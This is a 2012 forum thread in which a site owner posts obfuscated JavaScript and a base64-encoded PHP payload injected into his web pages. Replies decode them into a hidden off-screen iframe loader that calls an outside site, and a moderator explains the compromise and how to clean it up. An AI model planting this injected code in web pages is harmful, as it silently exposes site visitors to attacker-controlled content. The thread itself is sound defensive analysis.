LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Non-*NIX Forums > Programming
User Name
Password
Programming This forum is for all programming questions.
The question does not have to be directly related to Linux and any language is fair game.

Notices

Reply
 
LinkBack Search this Thread
Old 11-21-2012, 12:59 PM   #1
LukasH
Member
 
Registered: Jul 2012
Posts: 31

Rep: Reputation: Disabled
Strange script on FTP?


Hello everyone,

I discovered a strange code/script/whatever on my FTP, it was added to my index.html. I think this is a pretty bad malware script (since as well chrome as well as my antivirus software absolutely do not like it), and I also think that all those numbers included can be "translated" or "decoded". I also tried googleing for a ANSII converter, but I couldnt translate it. Can you guys help me out?

Thanks in advance,

Lukas

Code:
<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--/c3284d-->
And if you have any further information on what do do, please feel free to reply or send me a pm. This is very urgent for me so please, please help!!!
 
Old 11-21-2012, 01:27 PM   #2
goossen
Member
 
Registered: May 2006
Location: Bayern, Germany
Distribution: Many
Posts: 224

Rep: Reputation: 41
Basically it places an ad on your site. It runs a JavaScript it will create a iframe with an URL containing the ad.
 
Old 11-21-2012, 01:29 PM   #3
firstfire
Member
 
Registered: Mar 2006
Location: Ekaterinburg, Russia
Distribution: Debian, Ubuntu
Posts: 608

Rep: Reputation: 352Reputation: 352Reputation: 352Reputation: 352
Hi.

Here is almost equivalent python script with less obfuscation:
Code:
f = [4, 0, 91, 108, 100, 88, 107, 95, 100, 101, 22, 91, 105, 99, 54, 91, 90,
      29, 32, 22, 112, 4, 0, 107, 88, 104, 21, 96, 92, 103, 100, 22, 50, 23,
      90, 100, 90, 107, 98, 92, 100, 105, 37, 89, 103, 92, 87, 105, 92, 59,
      97, 92, 99, 90, 101, 106, 29, 30, 95, 91, 105, 87, 98, 92, 29, 30, 50,
      3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 101, 102, 105,
      94, 107, 95, 100, 101, 51, 28, 88, 88, 104, 102, 98, 106, 107, 91, 28,
      50, 3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 105, 102,
      102, 50, 30, 35, 46, 48, 47, 90, 100, 29, 48, 4, 0, 94, 93, 104, 98,
      37, 105, 105, 112, 98, 90, 37, 98, 90, 93, 106, 50, 30, 35, 46, 48, 47,
      90, 100, 29, 48, 4, 0, 94, 93, 104, 98, 37, 105, 103, 90, 22, 21, 52,
      22, 23, 95, 106, 105, 103, 48, 36, 38, 99, 94, 90, 94, 86, 92, 98, 98,
      88, 112, 106, 105, 36, 99, 92, 106, 36, 111, 99, 97, 37, 102, 93, 103,
      24, 48, 4, 0, 94, 93, 104, 98, 37, 95, 89, 23, 51, 21, 30, 92, 103,
      100, 63, 89, 30, 49, 2, 1, 90, 100, 90, 107, 98, 92, 100, 105, 37, 88,
      100, 91, 111, 35, 88, 102, 101, 92, 100, 89, 58, 94, 94, 99, 90, 29,
      96, 92, 103, 100, 31, 48, 4, 0, 114, 50, 3, -1, 110, 95, 99, 91, 101,
      108, 37, 101, 99, 99, 101, 86, 91, 22, 50, 23, 92, 103, 100, 55, 89,
      91, 49, 2, 1];

s = ""
for i in range(286):
	s += chr(f[i] + 9 + i % 3)

print s
and here is the result:
Code:
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "http://michaelmazur.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
This script gets evaluated.

Last edited by firstfire; 11-21-2012 at 01:30 PM.
 
Old 11-21-2012, 01:30 PM   #4
goossen
Member
 
Registered: May 2006
Location: Bayern, Germany
Distribution: Many
Posts: 224

Rep: Reputation: 41
Here is how to decode it.
 
Old 11-21-2012, 01:34 PM   #5
LukasH
Member
 
Registered: Jul 2012
Posts: 31

Original Poster
Rep: Reputation: Disabled
Thanks already!

But now, is that a good thing or a bad thing?

Also, I found this in my include.php page:

Code:
#c3284d#
echo(gzinflate(base64_decode("nVTbjtowEH3vZ1gqShqjenwJcb3ePuwn9BHxgCDpBrUblETAgvj3zozDboVUVS0SEM/1nDnjPAybvt2Pj2P/eoH5vu/Gbnzd1+G6WY+b52w9bPPLKepw/dA22Sm/NH0UTd/9fHpe9yI0cWmlkh4kqAq/Slb0t5De8QkUSK2T30nvpbN08EpqL40mH4CWVIOyONlKjRGl9OhThstgmMNfQ4l09incVylIcXWD+Z5T0FgtUkdM9NIv6AG7+4QIVMn9FcGcsFW3csmB7Yyc3+MwJeOj3gAw1WUjFdGppb0fgMMZVMRtokeRvmIUHMnuf23opoY8GQRsnLSltJW0i9uUkAmdSR+cuuFK2NcspnTHsyfWiozpgePK/y/KGqFeqKFjfUk1N5FNAZiPFEzFilhuamXFvAlDmhPotxwMpshkIPI0CVaVu+oEw0ht/wQNAeBqIBKSAlj49xmXhpxosxgi4a87lvac1gZx4ITYoFnpKRLLuYpB2GnrcGp3wsINK4B9Ex8graRPW5luFZNMjD0/0ajgtzvxXtUxT3QmKqtwiKI+rEW44uU95HU8ti/b7rg8FOKHWIVjbMIQl6vQx29j3758D+eYZXX+VTx121p8ESIP51Ns+uIcmq7P2qiCrsq5K9y8fVShLSLkl11sA5av8yEORb88n1ZZdlzuVp+gyHxRZ2L30YgcP9M7ZDZrZjMFOsYIKq+zIQ8Pn6e30C8=")));
#/c3284d#
I tried to decode it via google'ing for a base64 decoder, but couldn't get a good decoding . What does this thing do?

Last edited by LukasH; 11-21-2012 at 01:36 PM.
 
Old 11-21-2012, 02:01 PM   #6
firstfire
Member
 
Registered: Mar 2006
Location: Ekaterinburg, Russia
Distribution: Debian, Ubuntu
Posts: 608

Rep: Reputation: 352Reputation: 352Reputation: 352Reputation: 352
Hi.

Uncompressing gives the same script:
Code:
<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script>
 
Old 11-21-2012, 02:17 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,524
Blog Entries: 51

Rep: Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601Reputation: 2601
Quote:
Originally Posted by LukasH View Post
is that a good thing or a bad thing?
Bad. Basically somebody exploited a loophole to inject ads in whatever you run. Both goossen and firstfire should have followed up by pointing that out. BTW uploading via FTP is a real classic one but it may not be the only infection vector. Cleaning up your include and rendered pages will not be enough. Find out where you run things (home, shared hosting, VPS, etc), what you run (CMS, web log, statistics, 3rd party plugins) and their versions (either current and maintained or obsolete, deprecated) plus check service access via SSH and obviously FTP.
 
Old 11-28-2012, 05:41 AM   #8
LukasH
Member
 
Registered: Jul 2012
Posts: 31

Original Poster
Rep: Reputation: Disabled
Umm. I would then prefer just to clean up the files that are infected with that evil, evil bastard, clean up the complete server and renew some passwords, and then get the files back up and running.

If that is not a good idea, please prevent me from doing that by giving a quick answer . Thanks !
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Trackbacks are Off
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Strange FTP Problem mcupples Linux - Server 3 04-05-2007 10:37 AM
Very Strange FTP script problem ??? lionking_x Linux - Newbie 1 08-15-2005 04:53 AM
strange FTP issue tanmaya Linux - Networking 2 05-23-2005 07:15 AM
Urgent Help: Perl FTP Script Using NET::FTP xboxter Programming 8 05-16-2005 06:57 PM
strange ftp question murshed Linux - General 10 03-06-2003 07:46 AM


All times are GMT -5. The time now is 10:27 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration